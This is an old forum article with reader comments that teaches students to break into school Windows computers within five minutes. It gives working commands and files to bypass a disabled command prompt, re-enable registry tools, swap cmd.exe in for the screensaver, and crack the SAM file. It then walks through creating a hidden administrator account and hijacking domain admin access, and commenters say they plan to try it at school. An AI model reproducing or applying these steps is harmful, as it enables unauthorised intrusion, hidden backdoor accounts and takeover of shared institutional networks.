Root in Under Five
Root in Under Five
Hey everyone. This article is about hacking schools. Since any longer than five minutes, you risk getting caught, this is hopefully going to teach you how to get root in five minutes or less. So, lets get started.
- Dedicated to H4xguy *
To those of you that think by getting root, you own the school, sorry to disapoint you. But, by getting root, you only own the comp your on. There is however, a way to get domain root, which I’ll discuss later.
Your first step is to try and get access to DOS. You can start by clicking
"start>all programs>accessories>cmd" or "start>run> type in 'cmd'"
If neither of those work, create a new text document. Name it “anything.bat” right click on it and click edit. Type “cmd” save and close it. Open it. If you see a black box and are able to type, you now have dos.
If that didn’t work, instead of typing “cmd”, type
@echo off
echo hello
pause
Open it, if you see “hello”, create a new text document and name it “anything.reg”, right click and edit.
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]
"Disabled"=dword:0
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0
This changes the registry value that blocks dos. So, type “cmd” in the .bat and see if it works. If that also didn’t work, theres still other ways.
If it didn’t work because for whatever reason, you can’t create a .bat, open up microsoft word, which I’m sure all schools have. Now, type in your commands and click “file>save as>” for the type, put “text document, and save as “anything.bat”. If that wasn’t the reason, I hope you have access to the C drive. If you do, go here “C:\Windows\system32" and create a new folder. Now, find “cmd.exe” and “scrnsave.scr” and copy them to the new folder. Goto the folder and rename “scrnsave.scr” to “scrnsaveold.scr”, and “cmd.exe” to “scrnsave.scr” And replace it with the real one in system32. Now the next time your screen saver appears, it will be full access dos. So, if you can, on the desktop, right click and select properties. Change the time to one minute. On windows xp, you may have to make sure the screensaver is “scrnsave”.
If that didn’t work, you can try the control panel, I’m not sure if you will be able to unblock dos from there or not, but you can try. If access to the control panel is disabled. Create a new folder and name it one of these. (only the {….} part)
Printers: {2227A280-3AEA-1069-A2DE-08002B30309D}
Control panel: {305CA226-D286-468e-B848-2B2E8E697B74}
Dial-up networking: {992CFFA0-F557-101A-88EC-00DD010CCC48}
Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
Folder options: {6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}
Dial-Up Networking: {992CFFA0-F557-101A-88EC-00DD010CCC48}
Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
Taskbar and startmenu: {0DF44EAA-FF21-4412-828E-260A8728E7F1}
Microsoft FTP folder {63da6ec0-2e98-11cf-8d82-444553540000}
Temporary Internet files {7BD29E00-76C1-11CF-9DD0-00A0C9034933}
ActiveX Cache folder {88C6C381-2E85-11D0-94DE-444553540000
Subscriptions folder {F5175861-2688-11d0-9C5E-00AA00A45957}
History {FF393560-C2A7-11CF-BFF4-444553540000}
Another way to get dos, is to create a prog. Uber0n has created such a program. You can find it at http://www.freewebs.com/uber0n/ You’ll need a c++ compiler.
If so far, nothing has worked. You need to crack the sam file. Pretty sure Cain & Abel has this option.
If you did get dos, it’s time to create yourself an admin acct. Type this.
@echo off
net user winsys password /add
net localgroup administrators winsys /add
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v winsys/t REG_DWORD /d 0
First Line just hides the file address and stuff. Second Line Creates the user “winsys” with the password of “password”. Third Line adds “winsys” to the administrators group. Fourth Line makes the acct “winsys” a hidden acct. If you see “The command completed successfully.” or something similiar, congragulations. You now have root. If it didn’t work, it means you have limited access dos, use the screensaver thing.
If you want domain root, you can either find the domain admin’s username and type
@echo off
net user [username] [newpassword]
That will change his/her pass. Or, if you can get on his/her comp, type this in dos.
net group "Domain Admins" [username] /add
This will add an acct to the domain admins.
Also, if you don’t have access to the C drive, or any other drive, theres a few ways to view it’s contents. You just need to be able to install programs. Google has a program called “Google Desktop” which indexes the computer and makes it searchable. Or, you can download a web browser such as Opera. In the url bar type this “file://” you should now see a list of drives. Enjoy.
Well, thats all for this article. Hope it’s understandable and enjoyable. If anyone else has anything to add, please let me know and I will add it. If anyone has any suggestion, please let me know.
ghost 18 years ago
not a bad article. looks really similar to one of mine, but its got a few fresh ideas. not bad mate
ghost 18 years ago
Nice, i like it… lots of ways to try to access command prompt. il be tryin those 2morrow :)
ghost 18 years ago
lol jacob, me too, espescially the CLSID folder names, I forgot about them unti now :)
ghost 18 years ago
this is nice. Thanks for taking the time and writing this.. It will help alot of people.
ghost 18 years ago
also another way to get to dos is go into system32 and click the "command" file it is really called command.com but it gets you to dos in case it is blocked :ninja:
ghost 18 years ago
@scubesteve sometimes access to the C drive is denied on some comps…but very nice article I will be trying to add an admin account tomy school comp on monday but i doubt it will work seeing as access to regedit is denied. and what do you mean by "use the screensaver thing"
ghost 18 years ago
You told us hot to gain root on Windows XP..what if your trying to gain root on a Apple iBook..I mean seriously; not all of us have Windows here..good article though. :|
ghost 17 years ago
lol i couldn't stop laughing while reading your article. try this if doesnt work try this if it doesnt work try this if it doesnt work try this…
lol that were lots of ways and at least one will work i rate it awseome just for the effort =)
Ayr4 17 years ago
You could also try to open notepad and type "command" and save it as test.bat and run it:)
ghost 17 years ago
I changed my cmd to scrnsave.scr and replaced the original scrnsave but windows automatically replaces it back with the original scrnsave :|
ghost 17 years ago
@SnigelSniper - yea I think that only works on windows 2000 or less, can't remember…
ghost 16 years ago
It says access is denied when I try to create a new folder in sys32, is there any way to get access?